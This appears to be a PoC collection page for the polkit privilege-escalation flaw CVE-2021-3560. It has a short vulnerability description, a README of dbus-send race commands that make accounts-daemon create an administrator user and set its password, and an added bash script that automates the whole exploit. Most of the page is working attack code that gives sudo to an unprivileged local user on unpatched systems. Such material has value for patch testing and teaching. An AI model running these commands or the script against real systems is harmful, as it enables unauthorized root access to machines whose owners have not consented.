Related vulnerability
Title:
polkit code issue vulnerability
(CVE-2021-3560)
Description: polkit is a component that controls system-wide privileges on Unix-like operating systems. By defining and checking authorization rules, it mediates communication between processes of different privilege levels. polkit has a code issue vulnerability: if the requesting process disconnects from dbus-daemon before polkit_system_bus_name_get_creds_sync is called, polkit cannot obtain the requester's unique uid and pid and therefore cannot verify the requester's privileges. The resulting error is mishandled and the request is authorized instead of rejected, so an unprivileged local user can have privileged D-Bus services (such as accounts-daemon) act on its behalf.
Introduction
# CVE-2021-3560-Polkit-Privilege-Escalation
by Mark, Qingchen Yu
To build the container:
```
docker build -t <image tag of your choice> .
```
To run the container:
```
docker run -it <image tag name>
```
1. Start with ``start.sh``
2. Measure execution time:
Note the 'real' time and calculate half of it. In step 3 dbus-send is killed after that delay, so that accounts-daemon has already forwarded the request to polkit but the requesting process is off the bus before polkit looks up its credentials.
```
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
```
3. Create a user with sudo privileges:
Replace X.XXX with half of the 'real' time from step 2, because the request has to be interrupted in the middle. The ``int32:1`` argument asks accounts-daemon for an administrator account, which is what gives the new user sudo.
The command runs in a loop of 10000 iterations.
You may need to run this step several times, since winning the race depends on timing.
```
for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
```
4. Check user creation
```
id samurai
```
It should show that the samurai user exists, along with its uid and groups. Run step 3 again if it does not.
5. Generate a password hash:
In this case the password will be 'iamsamurai'.
Note the hash that is generated.
```
openssl passwd -5 iamsamurai
```
6. Set a password for the new user:
Replace X.XXX with the same sleep duration as in step 3 and 'Password Hash' with the hash from step 5. Replace UUUU with the uid of 'samurai' shown by ``id samurai`` in step 4. The second string argument to SetPassword is the password hint. As in step 3, the call is raced 10000 times; there is no cheap way to confirm success other than logging in.
```
for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
```
7. Switch to the new user with the password you chose in step 5.
``su - samurai``
You should now be able to use sudo as this user.
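The steps above can be driven from one script. The following helper is an added example, not the repository's own ``poc.sh``: it automates measuring the round trip, races CreateUser until ``id`` reports the user, then races SetPassword. The user name, real name, password and the ``run`` argument are assumptions of this example; it assumes bash, GNU coreutils (fractional ``sleep``), ``dbus-send``, ``openssl``, and a target running accounts-daemon with an unpatched polkit.

```bash
#!/usr/bin/env bash
# Added helper for the manual procedure above (not the repository's poc.sh).
# Assumes bash, GNU coreutils, dbus-send, openssl and a vulnerable target.
# The names below are example defaults and can be overridden via environment.
set -u

TARGET_USER="${TARGET_USER:-samurai}"
TARGET_REALNAME="${TARGET_REALNAME:-Samurai}"
TARGET_PASSWORD="${TARGET_PASSWORD:-iamsamurai}"
TRIES="${TRIES:-10000}"
ACCOUNTS=org.freedesktop.Accounts
ACCOUNTS_PATH=/org/freedesktop/Accounts

# Turn a bash `time` "real" field ("0m0.014s", or "0.014" from TIMEFORMAT=%R)
# into plain seconds with three decimals.
real_to_seconds() {
  local field="${1%s}" minutes=0 seconds
  case "$field" in
    *m*) minutes="${field%%m*}"; seconds="${field#*m}" ;;
    *)   seconds="$field" ;;
  esac
  awk -v m="$minutes" -v s="$seconds" 'BEGIN { printf "%.3f", m * 60 + s }'
}

# The README's kill window: half of one full round trip, so accounts-daemon has
# already asked polkit for authorization but dbus-send has left the bus before
# polkit_system_bus_name_get_creds_sync looks up the requester's uid.
half_window_from_real() {
  awk -v t="$(real_to_seconds "$1")" 'BEGIN { printf "%.3f", t / 2 }'
}

# Step 2, automated: time one complete CreateUser call and return half of it.
measure_half_window() {
  local real
  real=$( { TIMEFORMAT=%3lR; time dbus-send --system --dest=$ACCOUNTS --type=method_call \
        --print-reply $ACCOUNTS_PATH $ACCOUNTS.CreateUser \
        string:"$TARGET_USER" string:"$TARGET_REALNAME" int32:1 >/dev/null 2>&1; } 2>&1 )
  half_window_from_real "$real"
}

# Steps 3 and 6: send the call in the background, kill dbus-send after the
# window, repeat up to `tries` times, and stop early once `check` succeeds.
# Remaining arguments go to dbus-send (destination, object path, method, args).
race() {
  local window="$1" tries="$2" check="$3" i=0
  shift 3
  while [ "$i" -lt "$tries" ]; do
    i=$((i + 1))
    dbus-send --system --type=method_call --print-reply "$@" >/dev/null 2>&1 &
    sleep "$window"
    kill "$!" 2>/dev/null
    if "$check"; then
      echo "succeeded after $i attempt(s)"
      return 0
    fi
  done
  return 1
}

user_exists() { id "$TARGET_USER" >/dev/null 2>&1; }

main() {
  local window uid hash
  window=$(measure_half_window)
  echo "kill window: ${window}s"
  # Steps 3/4: int32:1 requests an administrator account, which yields sudo.
  race "$window" "$TRIES" user_exists --dest=$ACCOUNTS $ACCOUNTS_PATH $ACCOUNTS.CreateUser \
    string:"$TARGET_USER" string:"$TARGET_REALNAME" int32:1 \
    || { echo "CreateUser race did not succeed; run again"; return 1; }
  uid=$(id -u "$TARGET_USER")
  # Steps 5/6: SetPassword takes the crypt hash and a hint. Success cannot be
  # checked without logging in, so this simply runs the fixed number of tries.
  hash=$(openssl passwd -5 "$TARGET_PASSWORD")
  race "$window" "$TRIES" false --dest=$ACCOUNTS "$ACCOUNTS_PATH/User$uid" \
    $ACCOUNTS.User.SetPassword string:"$hash" string:hint || true
  echo "step 7: su - $TARGET_USER  (password: $TARGET_PASSWORD)"
}

# Only run the race when invoked explicitly: bash poc-helper.sh run
if [ "${1:-}" = run ]; then
  main
fi
```

Run it with ``bash poc-helper.sh run`` inside the container. ``half_window_from_real`` accepts the 'real' field exactly as the bash ``time`` keyword prints it, so a window measured by hand in step 2 can be pasted in unchanged. If the CreateUser race does not win within the configured tries, re-measure: the window only has to be roughly right, but a value far from half the round trip never lands in the gap.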
File snapshot
[4.0K] /data/pocs/9faa3fe919c02dd8e3d8cf1b2e15221ab368d5c0
├── [9.0K] lessson.md
├── [ 32K] manual CVE-2021-3560-Polkit-Privilege-Escalation.pdf
├── [144K] Original Project Report.pdf
├── [ 11K] poc.sh
└── [1.9K] README.md
0 directories, 5 files
Notes
1. Prefer accessing the PoC through the original source.
2. If the source is gone or unreachable, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.